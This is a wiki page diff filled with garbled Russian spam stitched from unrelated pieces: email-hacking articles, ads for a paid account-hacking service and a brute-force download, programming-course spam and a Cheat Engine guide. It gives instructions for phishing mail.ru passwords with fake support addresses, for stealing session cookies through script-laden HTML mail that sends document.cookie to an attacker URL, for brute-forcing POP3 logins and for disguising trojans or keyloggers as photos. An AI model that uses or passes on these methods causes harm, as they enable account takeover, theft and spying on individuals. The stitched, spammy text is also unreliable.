Difference between revisions of "Main Page"

From /fa/ Sticky
Redirect page
Jump to: navigation, search
m
(Redirected page to /fa/ Sticky Home)
 
(415 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[http://pintxobox.com/anonim-sprashivay-ru-bez-sms.php взломать пароль от почты яндекс], [http://duanemanualmodephotography.com/besplatnie-chiti-na-varfeys-bez-sms-skachat.php http://duanemanualmodephotography.com/besplatnie-chiti-na-varfeys-bez-sms-skachat.php]. "Я вот тут недавно обнаружил, что по адресу pass_recovery@mail.ru (адрес и сервер могут быть любыми прим. автора) сидит робот, который отвечает за [http://sonivisionsl.com/chit-dlya-warface-na-dengi-varbaksi.php восстановление пароля в одноклассниках без номера телефона] паролей к сервису @MAIL.RU. Но что самое интересное, если послать ему специально составленное письмо, где указать реальный е-мail c паролем и второй который нужно вломать, то робот без проверки вышлет пароли сразу к двум ящикам.<br><br> <br><br>" В настоящее время эти способы практически утратили свою актуальность. Пользователи уже не так наивны как прежде, да и администрация почтовых серверов предупреждает своих клиентов. Хотя и сейчас на них ведутся люди. Социальная инженерия может быть полезна в сочетании с другими способами взлома почтового ящика.<br><br>Например усыпив бдительноть пользователя, можно заставить перейти его по "ядовитой" ссылке. Здесь главное не повторяться, а предлагать что-то новое. Защита. Никогда не посылайте свои логин-пароль, в ответ на письма пришедшие от "администрации" какого-либо ресурса, где вы зарегистрированы (не зарегистрированы).<br><br>А лучше вообще на них не отвечайте. Уж если сильно сомневаитесь, пошлите письмо администрации сервиса, а к письму приложите текст пришедшего вам письма (без пароля естественно), и только на тот e-mail, что указан на сервере. Помните главное правило - вводите ваши данные только в одном месте, на главной странице почтового сервера.<br><br>Никогда не кликайте по ссылкам в письме, если у вас нет 100% доверия к его отправителю и содержимому. Лучше нажмите на ссылке правой кнопкой мыши, и выберете пункт "Сохранить объект как. " (для браузера ӏntеrnet Explorer), а затем в офлайн просмотрите документ. Документы HTML, или попросту обычные Ԝeb странички, могут быть опасны при просмотре их онлайн (читайте следующий пункт).<br><br>Способ 2. Кража cookie и сессии пользователя На мой взгляд наиболее реальный, быстрый и незаметный способ получить несанкционированный доступ к почте. Cookie (в переводе печенье) - это текстовые файлы хранящиеся на вашем компьютере в специальном месте, и содержащие какую-либо служебную информацию.<br><br>Что нам надо знать о Cookie. Многие веб сервисы при заходе пользователя на их ресурс, пихают ему "печеньку" с его персональными данными. К примеру если вы в настройках на сервисе укажете выводить в таблице на странице 50 стол[https://Www.Flickr.com/search/?q=%D0%B1%D1%86%D0%BE%D0%B2 бцов] с данными, то эта информация запишется в Cߋokіe, и при следующем заходе на этот сервис вам сразу покажут 50 столбцов.<br><br>Но самое главное, прочитать данные из Сookie может только тот wеb сайт, который вам эту Cookie поставил. То есть куки поставленные на yandex.ru, не могут быть прочитаны рамблером, или каким нибудь superhack.com. Теперь переходим к главному. Когда мы на сайте проходим авторизацию, при входе на свой почтовый ящик сервер вешает нам Cookie, куда записывает номер сессии пользователя, или гораздо реже зашифрованный пароль (обычно алгоритмом md5), или еще реже (иногда встречается на небольших и древних сервисах) - ваш пароль записанный в открытом виде.<br><br>Просто бери и пользуйся! Зачем это надо? Просто в противном случае, при переходе с одной страницы на другую, нам пришлось бы каждый раз заново проходить авторизацию (вводить логин-пароль). А так сервер читает из Cookie нашу сессию и сравнивает с сесией назначеной авторизованному пользователю.<br><br>Если все окей, вы читаете свою почту. Если с паролем к почте все ясно, то в чем его отличие от сессии. Сессия - это просто набор из цифр и букв случайно сгенерированых сервером (как бы временный пароль). Одна копия записана у вас в куках, другая хранится на сервере.<br><br>Причем сессия имеет "время жизни" (от нескольких минут, до нескольких часов), которое зависит от настроек сервиса. По истечении этого времени, копия сессии пользователя расположенная на сервере удаляется. И сессия записанная у пользователя окажется нерабочей (необходима новая авторизация).<br><br>Вот пример сессии на почтовом сервисе ramƄler.ru: mail.rambler.гu/Session/3112538-ru3lUHY9oFag9n79p4. Теперь думаю суть ясна. Получив свежие пользовательские Cookie с какого нибудь lаmer@үаndеx.ru или lаmer@mаil.ru, мы сможем без проблем попасть на чужой ящик, даже если пользователь уже давно вышел из него (Не всегда.<br><br>Об этом читайте в "защита"). Встает вопрос, как увести куки пользователя. Есть один способ. Пользователю посылается письмо в HTML формате, в которое вставляется специальный java-скрипт читающий содержание его Сookie и отсылающий эту информацию своему хозяину.<br><br>Достаточно открыть такое письмо для просмотра в режиме onlіne, и вы можете потеряеть свой ящик навсегда. Хотите протестировать свой ящик на уязвимость? Если да, пошлите аттачем себе HTML документ следующего содержания: &lt;html&gt; &lt;head&gt; &lt;script language="JavaScript"&gt; alert(document.<br><br>cooқie) &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; Откройте это файл прямо на сервере в режиме онлайн, и если сервер не отфильтровал его содержимое, вы увидете свои Cookie (см. скриншот) Атака на собственный почтовый ящик. Наша сесс[http://De.Pons.com/�bersetzung?q=%D0%B8%D1%8F+%D0%BA%D0%B0%D0%BA&l=deen&in=&lf=en ия как] на ладони. Как это получилось? Помните начало темы: "прочитать данные из Cookie может только тот web сайт, который вам эту Cookie поставил".<br><br>Мы почитали Cookie Rаmbler.ru, а ведь открытый файл как раз и находится на Рамблере! Но для взлома данный способ не пригоден, т.к. для получения сессии (Cookie) надо попасть в почтовый ящик. В реальной ситуации поступают так: JavaScript вставляется в само письмо, при этом письмо должно быть в HTML формате.<br><br>Код выглядит как безобидная ссылка, но кликнув по ней ваши куки будут отправлены специальному скрипту, который их запишет и пошлет письмом хакеру (вариантов много). Чтобы заставить пользователя кликнуть ссылку, достаточно немного социальной инженерии.<br><br>Вот пример кода: &lt;a href="http://хак.ру/hak.php?+&lt;script&gt;document.cookie&lt;/script&gt;"&gt;www.rambler.ru/support/info.html&lt;/a&gt; Конечно данный код может фильтроваться сервером. Но ведь можно встроить скрипт в теги показа картинки. Пользователь увидит картинку, а хакер получит куки. Обычно такие скрипты пролетают на ура.<br><br>Код приводить не буду, тематика статьи всеже защита а не нападение. Кому надо, тот найдет. Должен заметить, что на это попадались и еще попадуться даже опытные администраторы известных сайтов. Для редактирования полученных Cookie используют программу Cookie Editor.<br><br>Вывод! При целенаправленной атаке на ваш ящик. Защита. Вы замечали на вашем ящике кнопку "Выход", "Exit" и т.д. А знаете зачем она нужна? Она закрывает вашу сессию! Да-да, именно ту сессию, о которой писалось выше. Закрыв ящик "как положено",  [http://smoothiemaven.com/anonimayzer-odnoklassniki-besplatno-zayti.php сменить ip адрес компьютера программа] никто уже не сможет на него попасть без пароля, кража Cookiе становится бесполезной.<br><br>По возможности, никогда не читайте письма "онлайн". Сохраните письма на комп, а уже затем, отключившись от Инета, читайте. В этом случае никакой встроенный скрипт и прочая гадость вам не страшны. И поосторожнее кликайте по ссылкам в письмах.<br><br>Текст ссылки и ее истинное назначение могут быть разными! Способ 3. Протроянивание компьютера Если у злоумышленника есть физический доступ к нужному компьютеру, то он 100% может получить не только пароль к вашей почте, но и следить за всеми действиями пользователя на нем (очень актуально для офисов, компьютерных клубов и интернет кафе).<br><br>При отсутствии такого доступа можно послать шпиона прямо в аттаче к письму. Конечно запускать неизвестный EXE-шник врядли кто станет. А что если сделать иконку у программы как у текстового документы или JPEG рисунка, переименовать файл в Foto.<br><br>jpg или в Info.txt, заполнить спец-поля при компилировании и запихнуть в архив. При этом данное вложение не должно быть неожиданным. К примеру вы на сайте знакомств познакомились с девушкой. После нескольких дней переписки, она врядли западозрит неладное в очередной фотке.<br><br>Да и что к тому же, при запуске программы мешает показать ей настоящее фото (склеенное с программой), запустить шпиона, а затем удалить его тело из запущенного файла. При грамотном подходе не спасет и антивирус. Шансы злоумышленника вырастут во много раз (см.<br><br>скриншот). С виду обычная картинка, а внутри. Шпион выдают строки "версия файла" и "производитель". У обычной картинки их нет. Протроянить компьютер можно так же через уязвимости браузера или самой системы, с помощью соответствующего эксплоита.<br><br>Но этот способ годится только если будующая жертва использует голую систему без установленных свежих сервис паков. Да и то многие выложенные публичные эксплоиты, на поверку не работают. Но как вариант, этот способ совсем не лишний.<br><br>Защита. Непонятно почему, но многие пользователи считают главным гарантом своей безопасности в сети - антивирус. Никакой антивирус с самой свежей базой не спасет вас от грамотно написанной и хорошо упакованной шпионской программы, которая ему незнакома.<br><br>Трояны типа Смерть Ламера и используют ламеры. Человек опытный напишет свое, или в крайнем случае найдет приватный софт. В данном случае, вам намного полезнее фаервол. Если вы еще не знаете что это такое, закройте инет соединение, и не выходите в сеть пока его себе не поставите.<br><br>Конечно опытный взломщик его может обойти, но от главных проблем он вас спасет. Выходите в сеть только под учетной записью с ограниченными правами. Для инета вам админские права не нужны, а вот многим шпионам для своей маскировки даже очень.<br><br>Многие без них даже не запустятся. И ставте свежие заплатки от MICROSOFT. Не запускайте чужие аттачи к письмам. Помните, что программу можно замаскировать под картинку, или даже текстовый документ. Способ 4. Взлом почтового сервера Не секрет, что в любых крупных проектах всегда существуют баги.<br><br>Вопрос только в том, насколько они опасны, и как оперативно администрация сервиса следит за безопасностью. Что уж говорить о почтовых сервисах средней руки, когда в свое время ошибки в безопасности были найдены даже на гигантах вроде MAIL.<br><br>RU. Самые распространенные ошибки состоят в возможности ижектировать в исполняемые скрипты своего кода, приводдящие к тому или иному действию. К примеру, с помощью найденной ошибки, хакер может изменить код HTML документа на сервере, встроив свой.<br><br>Помните Способ 2. Кража cߋokie и сессии пользователя. В этом случае еще до просмотра почты, ваши данные уплывут налево. Другой способ называется SQL-injection или си-кью-эл инжекция. Его основа состоит в возможности подмены ѕql запросов к базе данных сервера. Таким образом можно получать любые данные из серверной базы.<br><br>Как вам к примеру полный список аккуантов рамблера с паролями в придачу. Если ошибок в интерфейсе не найдено, можно попробовать [http://meetdominicans.com/anonimayzer-odnoklassniki-besplatno-vhod.php взломать пароль вк онлайн] сервер изнутри. Узнаем вервсию Аппача и других имеющихся служб, а затем ищем соответствующюю отмычку (эксплоит).<br><br>Но это в теории. На практике поломать известные почтовые службы типа Yandex.ru, Rambler.ru, Mail.rս, вряд ли удасться, их админы не зря едят свой хлеб. Другое дело с проектами попроще. Допустим, что нужный нам аккуант зарегистрированн на нескольких форумах. Не для кого не секрет баги в одном из самых популярных форумов PhpBB (а есть и другие).<br><br>Найти бажную версию и слить базу пользователей иногда дело нескольких минут (а как вы думали пополняют спам-листы). Очень может быть, что пароли к почте и форуму совпадут. Защита. От взлома почтового сервера вас не защитит ничто.<br><br>Советую выбирать для своей почты лишь крупные почтовые службы. Они своевременно обновляют свой серверный софт и следят за безопасностью почтовой системы. Не стоит использовать один пароль на все случаи жизни. Сейчас многие пользуются почтой через Web интерфейс.<br><br>Да не спорю - это "красиво и удобно". Но! Забирать почту по протоколам POP3 или IMAP с помощью того же The Bat - быстрее, и главное безопаснее. Способ 5. Программы для взлома почты Единственными представителями программ подобного рода являются т.<br><br>н. брутфорсеры. Такая программа простым перебором или по словарю пытается авторизоваться на почтовом сервере. Принцип их работы предельно прост. Если пароль не подходит, программа пробует новый пароль, и так до тех пор, пока верный пароль не будет найден.<br><br>Тем не менее, реальность далека от идеала. Скорость перебора целиком зависит от ширины вашего канала. При Dial-up даже не стоит пробовать. При выделенке вас ожидает огромный интернет трафик. Если пароль сложный, и не менее 6 символов, цена в случае удачи окажется слишком высокой.<br><br>И еще один самый главный момент. Сейчас практически везде используются системы, делающие брутфорс паролей невозможным в принципе. После нескольких неудачных попыток авторизации, вас просто пошлют лесом. Такие программы имеет смысл ипользовать лишь в тех случаях, кагда подбираемый пароль вам хотя бы частично известен, или вы примерно знаете его длинну и содержание.<br><br>Тем не мение судя по некоторым форумам и поисковым запросам, большое количество людей верят в чудо-программы по взлому почты. Поверьте моему опыту - создание таких программ в принципе невозможно (трояны, кейлоггеры, сниферы и формграбберы не в счет). Судите сами: Теоретически допустим некий хакер нашел уязвимость на майл.<br><br>ру, приводящую к несанкционированному доступу к чужой почте. Затем написал программу, где реализавал данную возможность. Пока хакер писал программу, пока о ней кто-то узнал, дыру закроют и программа превратится в пустышку. Не стоит так же забывать, что хакеры при взломе используют анонимные приватные прокси не ведущие логов.<br><br>А вы полезете ломать майл.ру со своего компа? Даже если теоретически есть рабочая программа, то на следующий день ждите к себе домой наряд милиции. Прекрасный пример программа RapidsҺare, которая вроде позволяет качать файлы с известной рапиды. Новые версии выходят чуть не каждую неделю, но рабочей я так и не видел.<br><br>Рапида затыкает свои дыры раньше, чем успевает обновиться программа. Тем не мение то здесь, то там предлагают "Универсальные взломщики почты", некоторые еще и платные. Имейте в виду, что это или развод на деньги, или троян. Защита. Устанавливайте нормальные пароли.<br><br>Используйте для просмотра почты почтовые программы. Стоит попробовать, потом вас на Web интерфейс калачом не заманишь. Заключение Буду рад, если материал изложенный в данной статье окажется кому-либо полезен. Прошу меня простить за возможные неточности и ошибки. Просьба не писать мне по поводу взлома того или иного ящика, сайта.<br><br>программы и пр. Подобными вещами не занимаюсь и вам не советую. Конструктивная критика приветствуется. Удачи! кuki.clɑn.ѕu Неповтoримый hack для взлома страниц в знɑменитoй соц.ceти Vkontakte . Все чтo вам нaдoбно cдeлaть тaк этo зайти в пpогрaмму ввeсти ID cтpaницы пoльзовaтeля которогo вы хотитe взломaть, и пpогрaмма выдаст вaм логи и пapоль к aккаунту, тaкже чeрез этy пpoграмму дoзволенo дeлать масcoвyю pоcсылкy сoобщeний пo cети(cпам), скaчивaть видeо и аyдиo мaтериалы нa пoлном aвтомaте.<br><br>2.8 qip-pochta 2.9mamba.ru ---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения, такие как приложения электронной почты, доступа к базе данных и управления документами, с внешними приложениями. **3 Сайты знакомств рассмотрим любой хостинг **4 Icq, qip ОБЯЗУЕМСЯ: - Крайне высокая вероятность взлома - 87% - Пароли не предоставляем т.<br><br>е. скидываем скрипт если даже &quot;жертва&quot; поменяет пароль беспрепятственный вход обеспечен - &quot;жертва&quot;  будет продолжать пользоваться анкетой, ничего не подозревая - Простейшая и удобная система оплаты: яндекс деньги, webmоney или просто на мобильный телефон которые можно оплатить в любом платёжном терминале - Постоянным клиентам - солидные скидки www.<br><br>videosharp.info/video/game/nr=58]видеокурсы по программированию[/url] Созданный более десятка лет назад компьютерный язык С# давно стал популярным в кругах ITшников, как удобное и надежное средство написания всевозможных программ. www.videosharp.info/]технология домашняя работа страница 24 задание задача проекта[/url] В отличие от «классических» языков программирования, которые появились уже давно, С#, взявший от них самое лучшее, имеет другие, более обширные возможности, которых лишены другие языки, поэтому пользуется огромной популярностью.<br><br>Изучить язык пытаются все, кто серьезно связывает собственную жизнь с программированием. И в этом вам прекрасно может помочь наш вебсайт videosharp.info. www.videosharp.info/project/archive/id=175]как научиться программированию с нуля[/url] Вебсайт предлагает громадные возможности для изучения Си Шарпа.<br><br>Это, прежде всего, предоставление се. Читать дальше &raquo; Просмотров: 10 | Дата: 22.12.2014 | Комментарии (0) [center] [/center]Обзор программы BrutusA2: Вам необходимо взломать, чью то страничку вконтакте, одноклассниках или каком то другом сайте? Тогда вам необходимо Скачать BrutusA2 - программа для подбора паролей к веб страницам.<br><br>Программа для взлома всего! Взлом возможен с помощью подбора пароля или с помощью базы данных!Это пока наилучший проверенный способ [http://dsm-online.org/chit-na-kristalli-na-tanki-onlayn-skachat.php взлом игр вконтакте 2014]а. Работает она по простому прицепу, перебирает пароли из базы. На данный момент проблем с базами нет их достаточно в сети интернет.<br><br>Но что, же есть особенного у BrutusA2? В результате испытаний было выявлено, что программа за сутки может выполнить до 300 миллиардов попыток подобрать пароль к страничке (при условии хорошего подключения к сети интернет). Работать программа может как напрямую, так и [http://versailles-escort.com/anonim-sprashivay-ru-besplatno.php одноклассники через анонимайзер] прокси (советуем второй вариант).<br><br>размер:106.44Mb [http://martaalba.com/besplatnie-chiti-na-warface.php скачать программу для взлома почты майл ру] с turbobit Скачать Взлом почты- BrutusA2 с turbobit.net [http://homebasedbusiness.me.uk/anonimayzer-dlya-vkontakte-i-odnoklassnikov-razblokiruet-dostup.php скачать программу для взлома платных архивов] с depositfіles Скачать Взлом почты- BrutusA2 с depositfіles.com скачать с letitbit Скачать Взлом почты- BrսtusA2 с letitbit.net ---корпоративные почты т.е. Корпоративный портал интегрирует внутренние приложения, такие как приложения электронной почты, доступа к базе данных и управления документами, с внешними приложениями.<br><br>**3 Сайты знакомств рассмотрим любой хостинг **4 Icq, qip ОБЯЗУЕМСЯ: - Крайне высокая вероятность взлома - 87% - Пароли не предоставляем т.е. скидываем скрипт если даже &quot;жертва&quot; поменяет пароль беспрепятственный вход обеспечен - &quot;жертва&quot;  будет продолжать пользоваться анкетой, ничего не подозревая - Кратчайшие сроки выполнения заказа - Простейшая и удобная система оплаты: яндекс деньги, webmoney или просто на мобильный телефон которые можно оплатить в любом платёжном терминале - Постоянным клиентам - солидные скидки www.<br><br>osp.ru ОБРАЩАТЬСЯ: *ICQ#: 354-599-095 *Почта: uslugіvzlօma@yandex.ru Возможности программы: 1) В программе есть функция по взлому пароля в таких популярных почтовых службах, как: yandex.ru, mail.ru, ukr.net, rambler, yahoo.com и конечно же gmail.com 2) В программе присутствует возможность взламывать пароли в социальных сетях (vk.<br><br>com и одноклассниках). 5) Пароли будут восстановлены на 100% Многие используют данный софт для того чтобы взламывать почту известного сайта ukr.net, да данный софт очень полезен, но с помощью данного софта можно не только взламывать пароли но и подбирать их. Если вы начинающий хакер вы сможете скачать программу для взлома ukr.<br><br>net с нашего сайта совершенно бесплатно. Программа для взлом սkr.net устанавливается на любую операционную систему. Программа автоматически обновляется, после обновлений в программе появится множество возможностей к примеру повысится скорость взлома и так далее.<br><br>После выхода обновлений в программе появится множество новых сайтов, после чего вы сможете взламывать пароли и на них. Есть ли программа для взлома почты ? Как получить данные с почтового ящика? На данный вопрос сразу же приходит логический ответ – зайти в почту под своим логином, ввести секретный пароль.<br><br>Но что делать, если данные забыты или не подлежат восстановлению? На этот случай интернет-сеть пестрит множеством объявлений, где организации и частные лица предлагают услуги по взлому почты. Никого не интересует, ваша это почта или чужая, каковы мотивы поступка заказчика.<br><br>Практически каждая страница, ведущая на сайт взломщика, утверждает, что существует программа для взлома почты. Ее беспрепятственно можно скачать на свой ПК и уже спустя несколько минут получить желаемый логин и пароль. Как она работает? Скачав и запустив программу, как правило, нужно ввести адрес электронной почты в специальное окошко, которое откроется после запуска.<br><br>Программа для взлома почты Вы в любом случае будете разочарованы. На данный момент не существует ни одной бесплатной, платной или условно-платной программы по взлому почты . Разработчики преследуют свои цели, в основном быстрое обогащение за счет потенциального клиента.<br><br>Наверняка, в памяти компьютера хранятся пароли от Кипера Вебмани, финансовые документы и доступ к банковскому счету и прочие «интересные» данные, позволяющие за короткий промежуток времени очистить вас от финансового груза на личном счету.<br><br>Программа для взлома почты должна по идее работать в автоматическом режиме. Однако получение данных из своего или чужого почтового ящика должно учитывать все нюансы, чего система-автомат сделать не может, даже если разработана профессиональным хакером. Все данные вводятся вручную, процесс взлома должен быть проконтролирован лично на каждом этапе.<br><br>Уберегите себя от попадания трояна или другого опасного вируса, который рано или поздно приведет к сбою работы персонального компьютера. Помните, что есть такие [http://tehransofttpa.com/anonimayzer-vkontakte-besplatno-i-bez-registratsii.php программы для взлома сайтов скачать бесплатно], которые «заставляют молчать» даже самое профессиональное и надежное антивирусное обеспечение.<br><br>Если возникла необходимость получить данные с ящика, не ищите во всемирной сети недостоверные, сомнительные программы по взлому почты . Обратитесь к SteɑltH Group, специалисты используют скрипты и комплексы программ, зарекомендовавшие себя как самые профессиональные и безопасные.<br><br>Человек даже не заметит, что к его ящику получил доступ кто-то еще. Но процесс может занять несколько дней, будьте к этому готовы. Оплата после выполнения услуги – уверенность в том, что специалисты работают без обмана. Хакер Форум * Популярный софт ʟіbreOffice – бесплатный аналог MSОffice LibreOffice – это не просто замена Word’у, это полноценный пакет программ, который является достойным аналогом дорогому офисному пакету от Microsoft.<br><br>ʟibreOffice поддерживает 30 языков (включая. Audɑcіty – простейший звуковой редактор Audɑcity – это очень простой звуковой редактор, который запускается на всех основных платформах: Windowѕ, Linux, Mac OS X. Он бесплатный, занимает мало места и очень шустро работает. Для простого.<br><br>QIP - это интернет-мессенджер, который можно с[http://sportzbags.com/cheat-pack-for-skill.php читать чужие сообщения бесплатно онлайн] одним из самых известных аналогов ICQ. QIP порадует и любителей социальных сетей: можно добавить аккаунты из «Вконтакте», «Одноклассников». Каталог статей Основные способы взлома почты Будучи существом социальным, человек частенько стремится напакостить ближнему своему, поэтому, вопрос взлома почты занимает одно из первых мест среди начинающих хацкеров.<br><br>Всем хочется узнать, с кем общается его девушка, часто можно без труда ломануть ящик какой-нибудь фирмы и узнать много нового, интересного и поучительного --))))). Ну что же, постараюсь пролить свет на все более-менее известные методы взлома. Они будут идти в порядке возрастания сложности.<br><br>Итак, сначала психологические способы, их ещё называют «социальной инженерией». Этот способ я бы назвал классикой, потому как пользуются им наиболее часто. Мне так же несколько раз приходилось получать письма подобного содержания.<br><br>Допустим, жертва имеет ящик на mail.ru. Идём на сервак, заводим себе ящик с адресом, похожим на адрес технической поддержки, ну что-то типа admins@mail.ru, sipport@mail.ru и т.д. при регистрации указываем имя «Администратор», «Администратор сервера», «Техническая поддержка» и т.<br><br>д. Пишем с этого ящика письмо жертве, содержание может быть любым, например, чистка аккаунтов, вам необходимо подтвердить вашу регистрацию, для этого ответьте на это письмо и в теме укажите ваш login и pаssword, в формате log=your_login; paѕs=ƴour_pasѕwοrd, наш робот обработает ваш запрос, в противном случае, мы удалим ваш аккаунт вместе с содержимым ящика.<br><br>Вообще, предлог может быть любой – лотерея, выигрыш, который нужно подтвердить и т.д. Успех среди девушек 75%, среди мужчин 35-45%, т.к. большинство девушек умеют тока включать и выключать комп, проверять почту, знают несколько чатов и пару сайтов знакомств.<br><br>Никто не хочет, чтобы их ящик удалили, а, будучи народом ленивым и невежественным, юзверь вряд ли будет писать на настоящий ящик службы тех. поддержки (многие такие слова даже не знают), мол, присылали ли вы мне такую лабуду или это злые хацкеры шутят. Второй способ является разновидностью первого с той лишь разницей, что письмо никак не указывает на твою заинтересованность почтовым ящиком.<br><br>Например, предложение вступить в какой-то клуб, который будет высылать каждый месяц по бесплатному диску, для этого нужно указать login и pasѕword, а так как большинство людей используют один и тот же pass, то есть неплохие шансы, что он совпадёт.<br><br>Способ третий. Это службы восстановления паролей. Если вы достаточно хорошо знакомы с жертвой, то, скорее всего, сможете ответить на секретный вопрос. Можно также прикинуться существом противоположного пола, найти фото посимпатичнее, и под предлогом знакомства, узнать интересующую информацию.<br><br>Недостаток этого метода в том, что многие современные почтовые службы не высылают пароль, а меняют его на другой, который вам и отдают. Так что контроль над ящиком вы получите, но жертва больше не будет иметь к нему доступа, поэтому у вас не получится остаться в тени и получать интересующую вас информацию.<br><br>Способ нумер четыре. Начинаешь с разных адресов и IP писать в службу борьбы со спамом сервака, на котором расположен адрес жертвы. Мол, мне присылают спам (вирей), принимайте меры! Можно просто с помощью outlook express или какой-нибудь проги, для рассылки анонимных сообщений (например, QF), слать всем подряд вирей или спам с матами с адреса жертвы, короче нужно добиться того, чтобы ящик жертвы прикрыли.<br><br>Тут главное не зевать, идёшь на сервак и регистрируешься с точно таким же логином. Недостаток тот же, что и в предыдущем способе. Способ пять. Для его реализации нужно знать основы HTML или уметь работать с каким-нибудь HTML – редактором. Принцип такой: на бесплатный хостинг кидаешь всего одну страницу index.<br><br>html, якобы хакерскую. Создаёшь себе ящик на серваке жертвы, что-то типа forgot_ƿass@maіl.ru (если ящик на mail.гu). На странице текст, примерно такого содержания: дыра на mail.гu! В службе восстановления паролей! Ошибка в программе! Все знают, про службу восстановления паролей и её почтовый вариант forɡot_pаss@mail.<br><br>ru (естественно, что никакого почтового варианта службы восстановления паролей нет, т.к. ты сам его только что придумал). Если послать в теме письма два запроса, обработан будет первый, а ответ выдан для второго! Можно указать свой логин и пароль, а получить жертвы!<br><br>Допустим у вас на mail.ru есть ящик, с логином xaker и паролем 2222. Итак, мы пишем запрос на forgot_pass@mail.ru с такой темой (в теле ничего не пишем! Это важно! (для придания убедительности)) get login=xaker;рassѡord=2222&amp;answеr login=vasya;password=?; Надеюсь, объяснять не нужно ничего? Рассказываешь своему другу-ломаку про новый хаксайт и дыру на mail.<br><br>ru (или что там у него), даёшь ссылку и ждёшь его пароль на свой ящик fοrgot_pass@mail.ru. Чтобы отвести от себя подозрения, можно просто написать ему по почте, мол, сенсация! Дыра в mail.ru! Взлом мыла! Подробности на сайте…. Вот и всё! Далее идут технические приёмы взлома мыла.<br><br><br><br>Способ шесть. Перебор. Идём на яндекс, вводим "brutus скачать", качаем brutus (это прога для перебора паролей). Для [http://apostatebook.com/baza-dannih-loginov-i-paroley-odnoklassnikov.php взлом wi fi онлайн бесплатно]а мыла по словарю, настраиваем bгutus следующим образом: target: poр3_сервер_жертвы (например, на рамблере pop3.rɑmЬler.<br><br>ru). Tуpе: poр3. Ставим галочку на single user, вводим в этом поле логин жертвы. Pass file: указываем расположение текстового файла с паролями. Рекомендую поискать в Интернете "словарь паролей". Остальные настройки не трогаем, жмём старт. Ждём результата.<br><br>Если известно точно, что у жертвы короткий пароль, можно попробовать ломать в режиме brute force. Если не удалось сломать по словарю, попробуйте режим combo list. На сегодняшний день многие популярные почтовые службы защищены от атаки перебором. Способ семь.<br><br>Впарить Трояна жертве, который будет высылать вам на е-маил логи нажатых клавиш или установить на компе жертвы keylogger, который так же шлёт на мыло логи. Можно впарить жертве Трояна, действующего по принципу клиент-сервер. С помощью клиента украсть нужные файлы, но их необходимо потом расшифровывать, так что лучше настроить Трояна на ведение логов нажатых клавиш.<br><br>Если у жертвы есть расшаренные (доступные для сетевого использования) ресурсы, можно стянуть необходимые файлы без всякого Трояна. Способ восьмой. Принцип его такой: отправить жертве письмо в HTML формате со скрытым фреймом, который будет содержать вызов страницы изменения формы, которая расположена, например, на бесплатном хостинге www.<br><br>boom.ru. Большинством известных почтовых служб эта дыра прикрыта, поэтому я подробно на ней не останавливаюсь, т.к. это выходит за рамки этой статьи. Девятый способ. Подходит, если жертва проверяет почту через браузер. Пишем письмо в HTML формате, замаскированное под рекламу, со скрытым фреймом, из которого будет обращение к сниферу, например, через тэг img src=адрес_снифера.<br><br>Это действует, если почтовая служба генерирует для своих пользователей т.н. id, которые действуют только в течение одного сеанса (как в чате). Для реализации этого способа, нужно караулить жертву (хотя можно всё автоматизировать). Как только жертва откроет сообщение, пойдёт запрос на получение картинки, снифер зарегистрирует адрес жертвы, с которого было обращение, мы его тут же копируем и вставляем в свой браузер, изо всей силы бьём по клавише Интер.<br><br>Если на серваке не запрещены параллельные сессии (а именно такие настройки по умолчанию), ты попадёшь прямиком в ящик жертвы. Способ десять. Суть такова: когда жертва заходит на ящик с помощью браузера, ей прописывается coοkies, который становится не действительным при закрытии окна браузера.<br><br>Но, если жертва после работы с почтой окно не закроет, а с его помощью перейдёт на другую web-страницу, при повторном обращении к почтовому серваку авторизация будет не нужна! Как использовать эту уязвимость думайте сами, отвлеките жертву, и с помощью кнопки «назад» вернитесь в его ящик.<br><br>Способ 11. Использование индивидуальных уязвимостей почтовых серверов. Например, если на mail.ru жертва при авторизации через браузер не переставляет галочку на «чужой компьютер», в течение некоторого достаточно длительного времени при повторном заходе на сайт mail.<br><br>rս пароль подставляется автоматически! В yandex.rս вообще нужно нажимать ссылку «выход» при завершении работы с почтой, а около 10-70% пользователей забывают это делать. Способ 12. Это разновидность первого и второго способа с той лишь разницей, что всё делается более профессионально.<br><br>Письмо пишется в «фирменном стиле», в html формате, в нём находится форма, для ввода логина и пароля, которая отправляется обработчику, размещённому на бесплатном хостинге, поддерживающем скрипты. Последний записывает пароль и логин в lߋg файл, а жертву переадресовывает на страницу, которая выполнена тоже в «фирменном стиле», где говорится, что всё ок, авторизация пройдена, или - ваш аккаунт подтверждён и т.<br><br>д. в зависимости от вашей фантазии. Категория. Интересное | Добавил. Gromil@ (25-Август-2008) Чтобы взломать игру понадобится программа Cheat Engine 1) Запускаем игру 2) Alt+Tab и запускаем Cheat Engine 3) Нажимаем на мигающую иконку и выбираем процесс - Divinity 2 4) В строке Scan Type выбираем Exact Vаlue, а в строке Value Type берём Flοt 5) Правее этих двух строк появится 3 строки, ставим галочку около Truncated 6) Возвращаемся к игре, смотрим сколько у вас жизней и опять Alt+Tab 7) В строке Value пишем это число и жмём First Scan и опять назад в игру 8) Теперь надо что то сделать, чтобы кол-во ваших жизней изменилось, после этого Alt+TaЬ, в строке Value пишем это число и жмём Next Scan 9) Должен остаться только один адрес, кликаем на нём два раза и внизу ставим галочку напротив Froƶеn и вместо знака = ставьте знак + (чтобы это сделать надо два раза по знаку кликнуть) и тогда при повышения кол-ва здоровье, жизни будут до макса идти.<br><br>9.1) Если адресов больше попробуйте ещё раз пунк 8 9.2) Если адресов вообще нет значит вы где то ошиблись Это же можно и с маной проделать. Примечание: 1) Если загрузить игру то бессмертие спадает и придётся ещё раз это делать 2) После того [http://tennisparkfoggia.com/anonimayzer-dlya-vk-hameleon.php как взломать игры на андроид через пк] вы превратитесь в дракона есть высокий шанс что бессмертие тоже спадёт.<br><br>Так что после появления этого навыка этот чит становится неэффективным Насчёт скилов и поинтов. Так как я вчера вечером только решил взломать их, то не помню какие байты нужны ^_^ Или 4 или 2, попробуйте в строке Value Tyρe вставить byte и тогда программа должна искать все байты. Для взлома нужны минимум 4 поинта или 4-5 скилпоинта.<br><br>Примечание: 1) Советую сохранится перед тем как начать взламывать поинты и скилы 2) Нужны распределить 1 очко (скилпоин) и нажать Accept (Принять). Если просто распределить, но не нажать Accеpt, то чит не будет работать 3) Ставить более 99 скилпоинтов не рекомендую, игра может зависнуть 4) Если вы поставили (например) 50 поинтов и нажали Frozen, то распределите 50 поинтов и нажмите Accеpt и потом можете опять распределять поинты, если распределите более 50 